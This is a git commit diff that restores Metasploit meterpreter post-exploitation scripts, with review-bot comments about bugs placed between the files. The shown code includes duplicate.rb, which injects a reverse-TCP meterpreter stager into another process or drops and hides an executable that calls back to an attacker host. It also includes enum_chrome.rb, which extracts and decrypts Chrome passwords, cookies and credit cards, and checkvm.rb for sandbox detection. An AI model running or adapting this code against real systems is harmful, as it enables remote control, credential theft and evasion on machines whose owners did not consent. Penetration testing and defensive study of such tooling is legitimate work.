
Revert "delete meterpreter scripts with replacement post modules"

This reverts commit 13b06db48e.
William Vu 2 years ago
parent
commit
1791f209fa
35 changed files with 6560 additions and 0 deletions
  1. 209
    0
      scripts/meterpreter/autoroute.rb
  2. 359
    0
      scripts/meterpreter/checkvm.rb
  3. 153
    0
      scripts/meterpreter/duplicate.rb
  4. 244
    0
      scripts/meterpreter/enum_chrome.rb
  5. 292
    0
      scripts/meterpreter/enum_firefox.rb
  6. 101
    0
      scripts/meterpreter/enum_logged_on_users.rb
  7. 132
    0
      scripts/meterpreter/enum_powershell_env.rb
  8. 104
    0
      scripts/meterpreter/enum_putty.rb
  9. 124
    0
      scripts/meterpreter/enum_shares.rb
  10. 87
    0
      scripts/meterpreter/file_collector.rb
  11. 70
    0
      scripts/meterpreter/get_application_list.rb
  12. 177
    0
      scripts/meterpreter/get_filezilla_creds.rb
  13. 35
    0
      scripts/meterpreter/get_local_subnets.rb
  14. 64
    0
      scripts/meterpreter/get_valid_community.rb
  15. 381
    0
      scripts/meterpreter/getcountermeasure.rb
  16. 190
    0
      scripts/meterpreter/getgui.rb
  17. 109
    0
      scripts/meterpreter/getvncpw.rb
  18. 306
    0
      scripts/meterpreter/hashdump.rb
  19. 108
    0
      scripts/meterpreter/hostsedit.rb
  20. 212
    0
      scripts/meterpreter/keylogrecorder.rb
  21. 619
    0
      scripts/meterpreter/killav.rb
  22. 139
    0
      scripts/meterpreter/metsvc.rb
  23. 96
    0
      scripts/meterpreter/migrate.rb
  24. 219
    0
      scripts/meterpreter/packetrecorder.rb
  25. 259
    0
      scripts/meterpreter/persistence.rb
  26. 195
    0
      scripts/meterpreter/prefetchtool.rb
  27. 196
    0
      scripts/meterpreter/remotewinenum.rb
  28. 394
    0
      scripts/meterpreter/schelevator.rb
  29. 84
    0
      scripts/meterpreter/screen_unlock.rb
  30. 158
    0
      scripts/meterpreter/screenspy.rb
  31. 107
    0
      scripts/meterpreter/search_dwld.rb
  32. 210
    0
      scripts/meterpreter/service_permissions_escalate.rb
  33. 149
    0
      scripts/meterpreter/uploadexec.rb
  34. 141
    0
      scripts/meterpreter/webcam.rb
  35. 137
    0
      scripts/meterpreter/wmic.rb

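--- a/scripts/meterpreter/autoroute.rb
+++ b/scripts/meterpreter/autoroute.rb
@@ -0,0 +1,209 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to improve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+#
+# Meterpreter script for setting up a route from within a
+# Meterpreter session, without having to background the
+# current session.
+
+# Default options
+session = client
+subnet = nil
+netmask = "255.255.255.0"
+print_only = false
+remove_route = false
+remove_all_routes = false
+
+# Options parsing
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [false, "Help and usage"],
+  "-s" => [true, "Subnet (IPv4, for example, 10.10.10.0)"],
+  "-n" => [true, "Netmask (IPv4, for example, 255.255.255.0"],
+  "-p" => [false, "Print active routing table. All other options are ignored"],
+  "-d" => [false, "Delete the named route instead of adding it"],
+  "-D" => [false, "Delete all routes (does not require a subnet)"]
+)
+
+@@exec_opts.parse(args) { |opt, idx, val|
+  v = val.to_s.strip
+  case opt
+  when "-h"
+    usage
+    raise Rex::Script::Completed
+  when "-s"
+    if v =~ /[0-9\x2e]+\x2f[0-9]{1,2}/
+      subnet,cidr = v.split("\x2f")
+      netmask = Rex::Socket.addr_ctoa(cidr.to_i)
+    else
+      subnet = v
+    end
+  when "-n"
+    if (0..32) === v.to_i
+      netmask = Rex::Socket.addr_ctoa(v.to_i)
+    else
+      netmask = v
+    end
+  when "-p"
+    print_only = true
+  when "-d"
+    remove_route = true
+  when "-D"
+    remove_all_routes = true
+  end
+}
+
+def delete_all_routes
+  if Rex::Socket::SwitchBoard.routes.size > 0
+    routes = []
+    Rex::Socket::SwitchBoard.each do |route|
+      routes << {:subnet => route.subnet, :netmask => route.netmask}
+    end
+    routes.each {|route_opts| delete_route(route_opts)}
+
+    print_status "Deleted all routes"
+  else
+    print_status "No routes have been added yet"
+  end
+  raise Rex::Script::Completed
+end
+
+# Identical functionality to command_dispatcher/core.rb, and
+# nearly identical code
+def print_routes
+  if Rex::Socket::SwitchBoard.routes.size > 0
+    tbl =	Msf::Ui::Console::Table.new(
+      Msf::Ui::Console::Table::Style::Default,
+      'Header'  => "Active Routing Table",
+      'Prefix'  => "\n",
+      'Postfix' => "\n",
+      'Columns' =>
+        [
+          'Subnet',
+          'Netmask',
+          'Gateway',
+        ],
+      'ColProps' =>
+        {
+          'Subnet'  => { 'MaxWidth' => 17 },
+          'Netmask' => { 'MaxWidth' => 17 },
+        })
+    ret = []
+
+    Rex::Socket::SwitchBoard.each { |route|
+      if (route.comm.kind_of?(Msf::Session))
+        gw = "Session #{route.comm.sid}"
+      else
+        gw = route.comm.name.split(/::/)[-1]
+      end
+      tbl << [ route.subnet, route.netmask, gw ]
+    }
+      print tbl.to_s
+  else
+    print_status "No routes have been added yet"
+  end
+  raise Rex::Script::Completed
+end
+
+# Yet another IP validator. I'm sure there's some Rex
+# function that can just do this.
+def check_ip(ip=nil)
+  return false if(ip.nil? || ip.strip.empty?)
+  begin
+    rw = Rex::Socket::RangeWalker.new(ip.strip)
+    (rw.valid? && rw.length == 1) ? true : false
+  rescue
+    false
+  end
+end
+
+# Adds a route to the framework instance
+def add_route(opts={})
+  subnet = opts[:subnet]
+  netmask = opts[:netmask] || "255.255.255.0" # Default class C
+  Rex::Socket::SwitchBoard.add_route(subnet, netmask, session)
+end
+
+# Removes a route to the framework instance
+def delete_route(opts={})
+  subnet = opts[:subnet]
+  netmask = opts[:netmask] || "255.255.255.0" # Default class C
+  Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session)
+end
+
+
+# Defines usage
+def usage()
+  print_status "Usage:   run autoroute [-r] -s subnet -n netmask"
+  print_status "Examples:"
+  print_status "  run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0"
+  print_status "  run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0"
+  print_status "  run autoroute -s 10.10.10.1/24              # CIDR notation is also okay"
+  print_status "  run autoroute -p                            # Print active routing table"
+  print_status "  run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1/255.255.255.0 route"
+  print_status "Use the \"route\" and \"ipconfig\" Meterpreter commands to learn about available routes"
+  print_error "Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module"
+end
+
+# Validates the command options
+def validate_cmd(subnet=nil,netmask=nil)
+  if subnet.nil?
+    print_error "Missing -s (subnet) option"
+    return false
+  end
+
+  unless(check_ip(subnet))
+    print_error "Subnet invalid (must be IPv4)"
+    usage
+    return false
+  end
+
+  if(netmask and !(Rex::Socket.addr_atoc(netmask)))
+    print_error "Netmask invalid (must define contiguous IP addressing)"
+    usage
+    return false
+  end
+
+  if(netmask and !check_ip(netmask))
+    print_error "Netmask invalid"
+    return usage
+  end
+  true
+end
+
+if print_only
+  print_routes()
+  raise Rex::Script::Completed
+end
+
+if remove_all_routes
+  delete_all_routes()
+  raise Rex::Script::Completed
+end
+
+raise Rex::Script::Completed unless validate_cmd(subnet,netmask)
+
+if remove_route
+  print_status("Deleting route to %s/%s..." % [subnet,netmask])
+  route_result = delete_route(:subnet => subnet, :netmask => netmask)
+else
+  print_status("Adding a route to %s/%s..." % [subnet,netmask])
+  route_result = add_route(:subnet => subnet, :netmask => netmask)
+end
+
+if route_result
+  print_good "%s route to %s/%s via %s" % [
+    (remove_route ? "Deleted" : "Added"),
+    subnet,netmask,client.sock.peerhost
+  ]
+else
+  print_error "Could not %s route" % [(remove_route ? "delete" : "add")]
+end
+
+if Rex::Socket::SwitchBoard.routes.size > 0
+  print_status "Use the -p option to list all active routes"
+end
+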
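Review bot: validate_cmd's final guard ends with `return usage`, while every other failure path returns false, so for an invalid netmask the method's result is whatever print_error happens to return rather than an explicit false; the branch should read `usage` followed by `return false`, matching the branch above it. The usage banner advertises `[-r]`, an option the parser never defines, while the actual delete flag is `-d`; the first line of usage should be `print_status "Usage:   run autoroute [-d] -s subnet -n netmask"`. The `-s` regex is unanchored, so a constructed value like `10.0.0.0/24/x` takes the CIDR branch and the trailing text is silently discarded; anchoring it with `\A` and `\z` makes the later check_ip validation the only gate rather than a partial match.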

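--- a/scripts/meterpreter/checkvm.rb
+++ b/scripts/meterpreter/checkvm.rb
@@ -0,0 +1,359 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+# Meterpreter script for detecting if target host is a Virtual Machine
+# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
+# Version: 0.2.0
+session = client
+
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [ false,"Help menu." ]
+)
+
+@@exec_opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    print_line("CheckVM -- Check various attributes on the target for evidence that it is a virtual machine")
+    print_line("USAGE: run checkvm")
+    print_line(@@exec_opts.usage)
+    raise Rex::Script::Completed
+  end
+}
+
+# Function for detecting if it is a Hyper-V VM
+def hypervchk(session)
+  begin
+    vm = false
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ)
+    sfmsvals = key.enum_key
+    if sfmsvals.include?("Hyper-V")
+      print_status("This is a Hyper-V Virtual Machine")
+      vm = true
+    elsif sfmsvals.include?("VirtualMachine")
+      print_status("This is a Hyper-V Virtual Machine")
+      vm = true
+    end
+    key.close
+  rescue
+  end
+
+  if not vm
+    begin
+      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
+      srvvals = key.enum_key
+      if srvvals.include?("vmicheartbeat")
+        print_status("This is a Hyper-V Virtual Machine")
+        vm = true
+      elsif srvvals.include?("vmicvss")
+        print_status("This is a Hyper-V Virtual Machine")
+        vm = true
+      elsif srvvals.include?("vmicshutdown")
+        print_status("This is a Hyper-V Virtual Machine")
+        vm = true
+      elsif srvvals.include?("vmicexchange")
+        print_status("This is a Hyper-V Virtual Machine")
+        vm = true
+      end
+    rescue
+    end
+  end
+  return vm
+end
+
+# Function for checking if it is a VMware VM
+def vmwarechk(session)
+  vm = false
+  begin
+  key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
+  srvvals = key.enum_key
+  if srvvals.include?("vmdebug")
+    print_status("This is a VMware Virtual Machine")
+    vm = true
+  elsif srvvals.include?("vmmouse")
+    print_status("This is a VMware Virtual Machine")
+    vm = true
+  elsif srvvals.include?("VMTools")
+    print_status("This is a VMware Virtual Machine")
+    vm = true
+  elsif srvvals.include?("VMMEMCTL")
+    print_status("This is a VMware Virtual Machine")
+    vm = true
+  end
+  key.close
+  rescue
+  end
+  if not vm
+    begin
+      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
+      if key.query_value('Identifier').data.downcase =~ /vmware/
+        print_status("This is a VMware Virtual Machine")
+        vm = true
+      end
+    rescue
+    end
+  end
+  if not vm
+    vmwareprocs = [
+      "vmwareuser.exe",
+      "vmwaretray.exe"
+    ]
+    vmwareprocs.each do |p|
+      session.sys.process.get_processes().each do |x|
+        if p == (x['name'].downcase)
+          print_status("This is a VMware Virtual Machine") if not vm
+          vm = true
+        end
+      end
+    end
+  end
+  key.close
+  return vm
+
+end
+# Function for checking if it is a Virtual PC VM
+def checkvrtlpc(session)
+  vm = false
+  vpcprocs = [
+    "vmusrvc.exe",
+    "vmsrvc.exe"
+  ]
+  vpcprocs.each do |p|
+    session.sys.process.get_processes().each do |x|
+      if p == (x['name'].downcase)
+        print_status("This is a VirtualPC Virtual Machine") if not vm
+        vm = true
+      end
+    end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("vpcbus")
+      print_status("This is a VirtualPC Virtual Machine")
+      vm = true
+    elsif srvvals.include?("vpc-s3")
+      print_status("This is a VirtualPC Virtual Machine")
+      vm = true
+    elsif srvvals.include?("vpcuhub")
+      print_status("This is a VirtualPC Virtual Machine")
+      vm = true
+    elsif srvvals.include?("msvmmouf")
+      print_status("This is a VirtualPC Virtual Machine")
+      vm = true
+    end
+    key.close
+    rescue
+    end
+  end
+  return vm
+end
+
+def vboxchk(session)
+  vm = false
+  vboxprocs = [
+    "vboxservice.exe",
+    "vboxtray.exe"
+  ]
+  vboxprocs.each do |p|
+    session.sys.process.get_processes().each do |x|
+      if p == (x['name'].downcase)
+        print_status("This is a Sun VirtualBox Virtual Machine") if not vm
+        vm = true
+      end
+    end
+  end
+  if not vm
+  begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("VBOX__")
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    end
+  rescue
+  end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("VBOX__")
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    end
+    rescue
+    end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("VBOX__")
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    end
+    rescue
+    end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
+    if key.query_value('Identifier').data.downcase =~ /vbox/
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    end
+    rescue
+    end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System')
+    if key.query_value('SystemBiosVersion').data.downcase =~ /vbox/
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    end
+    rescue
+    end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("VBoxMouse")
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    elsif srvvals.include?("VBoxGuest")
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    elsif srvvals.include?("VBoxService")
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    elsif srvvals.include?("VBoxSF")
+      print_status("This is a Sun VirtualBox Virtual Machine")
+      vm = true
+    end
+    key.close
+    rescue
+    end
+  end
+  return vm
+end
+
+def xenchk(session)
+  vm = false
+  xenprocs = [
+    "xenservice.exe"
+  ]
+  xenprocs.each do |p|
+    session.sys.process.get_processes().each do |x|
+      if p == (x['name'].downcase)
+        print_status("This is a Xen Virtual Machine") if not vm
+        vm = true
+      end
+    end
+  end
+  if not vm
+  begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("Xen")
+      print_status("This is a Xen Virtual Machine")
+      vm = true
+    end
+  rescue
+  end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("Xen")
+      print_status("This is a Xen Virtual Machine")
+      vm = true
+    end
+    rescue
+    end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("Xen")
+      print_status("This is a Xen Virtual Machine")
+      vm = true
+    end
+    rescue
+    end
+  end
+  if not vm
+    begin
+    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
+    srvvals = key.enum_key
+    if srvvals.include?("xenevtchn")
+      print_status("This is a Xen Virtual Machine")
+      vm = true
+    elsif srvvals.include?("xennet")
+      print_status("This is a Xen Virtual Machine")
+      vm = true
+    elsif srvvals.include?("xennet6")
+      print_status("This is a Xen Virtual Machine")
+      vm = true
+    elsif srvvals.include?("xensvc")
+      print_status("This is a Xen Virtual Machine")
+      vm = true
+    elsif srvvals.include?("xenvdb")
+      print_status("This is a Xen Virtual Machine")
+      vm = true
+    end
+    key.close
+    rescue
+    end
+  end
+  return vm
+end
+
+def qemuchk(session)
+  vm = false
+  if not vm
+    begin
+      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
+      if key.query_value('Identifier').data.downcase =~ /qemu/
+        print_status("This is a QEMU/KVM Virtual Machine")
+        vm = true
+      end
+    rescue
+    end
+  end
+  if not vm
+    begin
+      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\CentralProcessor\0')
+      if key.query_value('ProcessorNameString').data.downcase =~ /qemu/
+        print_status("This is a QEMU/KVM Virtual Machine")
+        vm = true
+      end
+    rescue
+    end
+  end
+
+  return vm
+
+end
+
+if client.platform =~ /win32|win64/
+  print_status("Checking if target is a Virtual Machine .....")
+  found = hypervchk(session)
+  found = vmwarechk(session) if not found
+  found = checkvrtlpc(session) if not found
+  found = vboxchk(session) if not found
+  found = xenchk(session) if not found
+  found = qemuchk(session) if not found
+  print_status("It appears to be physical host.") if not found
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end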
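Review bot: vmwarechk closes `key` a second time just before `return vm`, outside any rescue: when the first open_key succeeded the handle was already closed inside that begin block, and when it raised `key` is still nil, so `nil.close` raises NoMethodError and aborts the whole script before checkvrtlpc and the later checkers run. Drop that trailing `key.close` and release each handle in an `ensure` clause of the begin block that opened it; hypervchk, checkvrtlpc, vboxchk and xenchk also skip their `key.close` whenever enum_key raises, leaking the registry handle. The bare `rescue` clauses swallow every StandardError, not just the missing-key case they are meant to tolerate, so an unrelated transport failure is reported as "not a VM"; narrowing them to the request error class the session raises keeps the silence to the expected case. The lookups also hard-code `SYSTEM\ControlSet001\Services`; `CurrentControlSet` is the alias that resolves to whichever control set is active, so a host booted on another set is missed.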

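--- a/scripts/meterpreter/duplicate.rb
+++ b/scripts/meterpreter/duplicate.rb
@@ -0,0 +1,153 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+# Author: Scriptjunkie
+# Uses a meterpreter session to spawn a new meterpreter session in a different process.
+# A new process allows the session to take "risky" actions that might get the process killed by
+# A/V, giving a meterpreter session to another controller, or start a keylogger on another
+# process.
+#
+
+#
+# Options
+#
+opts = Rex::Parser::Arguments.new(
+  "-h"  => [ false,  "This help menu"],
+  "-r"  => [ true,   "The IP of a remote Metasploit listening for the connect back"],
+  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4546)"],
+  "-w"  => [ false,  "Write and execute an exe instead of injecting into a process"],
+  "-e"  => [ true,   "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],
+  "-P"  => [ true,   "Process id to inject into; use instead of -e if multiple copies of one executable are running."],
+  "-s"  => [ false,  "Spawn new executable to inject to.  Only useful with -P."],
+  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]
+)
+
+#
+# Default parameters
+#
+
+rhost    = Rex::Socket.source_address("1.2.3.4")
+rport    = 4546
+lhost    = "127.0.0.1"
+
+spawn = false
+autoconn = true
+inject   = true
+target_pid = nil
+target    = "notepad.exe"
+pay      = nil
+
+#
+# Option parsing
+#
+opts.parse(args) do |opt, idx, val|
+  case opt
+  when "-h"
+    print_line(opts.usage)
+    raise Rex::Script::Completed
+  when "-r"
+    rhost = val
+  when "-p"
+    rport = val.to_i
+  when "-P"
+    target_pid = val.to_i
+  when "-e"
+    target = val
+  when "-D"
+    autoconn = false
+  when "-w"
+    inject = false
+  when "-s"
+    spawn = true
+  end
+end
+
+print_status("Creating a reverse meterpreter stager: LHOST=#{rhost} LPORT=#{rport}")
+
+payload = "windows/meterpreter/reverse_tcp"
+pay = client.framework.payloads.create(payload)
+pay.datastore['LHOST'] = rhost
+pay.datastore['LPORT'] = rport
+mul = client.framework.exploits.create("multi/handler")
+mul.share_datastore(pay.datastore)
+mul.datastore['WORKSPACE'] = client.workspace
+mul.datastore['PAYLOAD'] = payload
+mul.datastore['EXITFUNC'] = 'process'
+mul.datastore['ExitOnSession'] = true
+print_status("Running payload handler")
+mul.exploit_simple(
+  'Payload'  => mul.datastore['PAYLOAD'],
+  'RunAsJob' => true
+)
+
+if client.platform =~ /win32|win64/
+  server = client.sys.process.open
+
+  print_status("Current server process: #{server.name} (#{server.pid})")
+
+  if ! inject
+    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
+    print_status("Meterpreter stager executable #{exe.length} bytes long")
+
+    #
+    # Upload to the filesystem
+    #
+    tempdir = client.sys.config.getenv('TEMP')
+    tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    tempexe.gsub!("\\\\", "\\")
+
+    fd = client.fs.file.new(tempexe, "wb")
+    fd.write(exe)
+    fd.close
+    print_status("Uploaded the agent to #{tempexe} (must be deleted manually)")
+
+    #
+    # Execute the agent
+    #
+    print_status("Executing the agent with endpoint #{rhost}:#{rport}...")
+    pid = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
+  elsif ! spawn
+    # Get the target process name
+    print_status("Duplicating into #{target}...")
+
+    # Get the target process pid
+    if not target_pid
+      target_pid = client.sys.process[target]
+    end
+
+    if not target_pid
+      print_error("Could not access the target process")
+      print_status("Spawning a notepad.exe host process...")
+      note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
+      target_pid = note.pid
+    end
+  else
+    print_status("Spawning a #{target} host process...")
+    newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
+    target_pid = newproc.pid
+    if not target_pid
+      print_error("Could not create a process around #{target}")
+      raise Rex::Script::Completed
+    end
+  end
+
+  # Do the duplication
+  print_status("Injecting meterpreter into process ID #{target_pid}")
+  host_process = client.sys.process.open(target_pid, PROCESS_ALL_ACCESS)
+  raw = pay.generate
+  mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
+
+  print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
+  print_status("Writing the stager into memory...")
+  host_process.memory.write(mem, raw)
+  host_process.thread.create(mem, 0)
+  print_status("New server process: #{target_pid}")
+
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end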
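Review bot: the `-D` option sets `autoconn = false` but nothing ever reads `autoconn`, so the handler documented as disableable is started unconditionally at `mul.exploit_simple`; that block should be wrapped in `if autoconn`, and `lhost` is likewise assigned and never used. The `-w` branch (`if ! inject`) passes `raw` to `Msf::Util::EXE.to_win32pe` before `raw = pay.generate` is assigned further down, so Ruby resolves the name as an undefined method and the branch fails with NameError; after that branch `target_pid` is still nil and control falls into the unconditional `# Do the duplication` block, so the branch needs its own `raise Rex::Script::Completed` once the file has been executed. That branch also calls `session.sys.process.execute` where the rest of the script uses `client` — I assume `session` is supplied by the script binding, but the inconsistency is worth removing. Finally the handler job is launched before the `win32|win64` platform check, so an unsupported session exits leaving a handler job running; moving the handler setup under that branch avoids the leak.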

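--- a/scripts/meterpreter/enum_chrome.rb
+++ b/scripts/meterpreter/enum_chrome.rb
@@ -0,0 +1,244 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+#
+# Script to extract data from a chrome installation.
+#
+# Author: Sven Taute <sven dot taute at gmail com>
+#
+
+require 'sqlite3'
+require 'yaml'
+
+if client.platform !~ /win32/
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end
+@host_info = client.sys.config.sysinfo
+@chrome_files = [
+  { :in_file => "Web Data", :sql => "select * from autofill;", :out_file => "autofill"},
+  { :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;", :out_file => "user_site"},
+  { :in_file => "Web Data", :sql => "select * from autofill_profiles;", :out_file => "autofill_profiles"},
+  { :in_file => "Web Data", :sql => "select * from credit_cards;", :out_file => "autofill_credit_cards", :encrypted_fields => ["card_number_encrypted"]},
+  { :in_file => "Cookies", :sql => "select * from cookies;", :out_file => "cookies"},
+  { :in_file => "History", :sql => "select * from urls;", :out_file => "url_history"},
+  { :in_file => "History", :sql => "SELECT url FROM downloads;", :out_file => "download_history"},
+  { :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;", :out_file => "search_history"},
+  { :in_file => "Login Data", :sql => "select * from logins;", :out_file => "logins", :encrypted_fields => ["password_value"]},
+  { :in_file => "Bookmarks", :sql => nil, :out_file => "bookmarks.json"},
+  { :in_file => "Preferences", :sql => nil, :out_file => "preferences.json"},
+]
+@migrate = false
+@old_pid = nil
+@output_format = []
+
+opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu" ],
+  "-m" => [ false, "Migrate into explorer.exe"],
+  "-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"]
+)
+
+opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-m"
+    @migrate = true
+  when "-f"
+    if val =~ /^j(son)?$/
+      @output_format << "json"
+    elsif val =~ /^y(aml)?$/
+      @output_format << "yaml"
+    elsif val =~ /^t(ext)?$/
+      @output_format << "text"
+    else
+      print_error("unknown format '#{val}'.")
+      raise Rex::Script::Completed
+    end
+  when "-h"
+    print_line("")
+    print_line("DESCRIPTION: Script for enumerating preferences and extracting")
+    print_line("information from the Google Chrome Browser on a target system.")
+    print_line("Decryption of creditcard information and passwords only supported")
+    print_line("on 32bit Windows Operating Systems.")
+    print_line("")
+    print_line("USAGE: run enum_chrome [-m]")
+    print_line(opts.usage)
+    raise Rex::Script::Completed
+  end
+}
+
+@output_format << "json" if @output_format.empty?
+if @output_format.include?("json")
+  begin
+    require 'json'
+  rescue LoadError
+    print_error("JSON is not available.")
+    @output_format.delete("json")
+    if @output_format.empty?
+      print_status("Falling back to raw text output.")
+      @output_format << "text"
+    end
+  end
+end
+print_status("using output format(s): " + @output_format.join(", "))
+
+def prepare_railgun
+  rg = client.railgun
+  if (!rg.get_dll('crypt32'))
+    rg.add_dll('crypt32')
+  end
+
+  if (!rg.crypt32.functions["CryptUnprotectData"])
+    rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [
+        ["PBLOB","pDataIn", "in"],
+        ["PWCHAR", "szDataDescr", "out"],
+        ["PBLOB", "pOptionalEntropy", "in"],
+        ["PDWORD", "pvReserved", "in"],
+        ["PBLOB", "pPromptStruct", "in"],
+        ["DWORD", "dwFlags", "in"],
+        ["PBLOB", "pDataOut", "out"]
+      ])
+  end
+end
+
+def decrypt_data(data)
+  rg = client.railgun
+  pid = client.sys.process.open.pid
+  process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+
+  mem = process.memory.allocate(1024)
+  process.memory.write(mem, data)
+
+  addr = [mem].pack("V")
+  len = [data.length].pack("V")
+  ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
+  len, addr = ret["pDataOut"].unpack("V2")
+  return "" if len == 0
+  decrypted = process.memory.read(addr, len)
+end
+
+def write_output(file, rows)
+  if @output_format.include?("json")
+    ::File.open(file + ".json", "w") { |f| f.write(JSON.pretty_generate(rows)) }
+  end
+  if @output_format.include?("yaml")
+    ::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) }
+  end
+  if @output_format.include?("text")
+    ::File.open(file + ".txt", "w") do |f|
+      f.write(rows.first.keys.join("\t") + "\n")
+      f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n"))
+    end
+  end
+end
+
+def process_files(username)
+  @chrome_files.each do |item|
+    in_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:in_file])
+    out_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:out_file])
+    if item[:sql]
+      db = SQLite3::Database.new(in_file)
+      columns, *rows = db.execute2(item[:sql])
+      db.close
+      rows.map! do |row|
+        res = Hash[*columns.zip(row).flatten]
+        if item[:encrypted_fields] && client.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
+          if @host_info['Architecture'] !~ /x64/
+            item[:encrypted_fields].each do |field|
+              print_good("decrypting field '#{field}'...")
+              res[field + "_decrypted"] = decrypt_data(res[field])
+            end
+          else
+            print_error("Can not decrypt #{item[:out_file]}, decryption only supported in 32bit OS")
+          end
+        end
+        res
+      end
+      if rows.length > 0
+        print_status("writing output '#{item[:out_file]}'...")
+        write_output(out_file, rows)
+      else
+        print_status("no '#{item[:out_file]}' data found in file '#{item[:in_file]}'")
+      end
+    else
+      ::FileUtils.cp(in_file, out_file)
+    end
+  end
+end
+
+def extract_data(username)
+  chrome_path = @profiles_path + "\\" + username + @data_path
+  begin
+    client.fs.file.stat(chrome_path)
+  rescue
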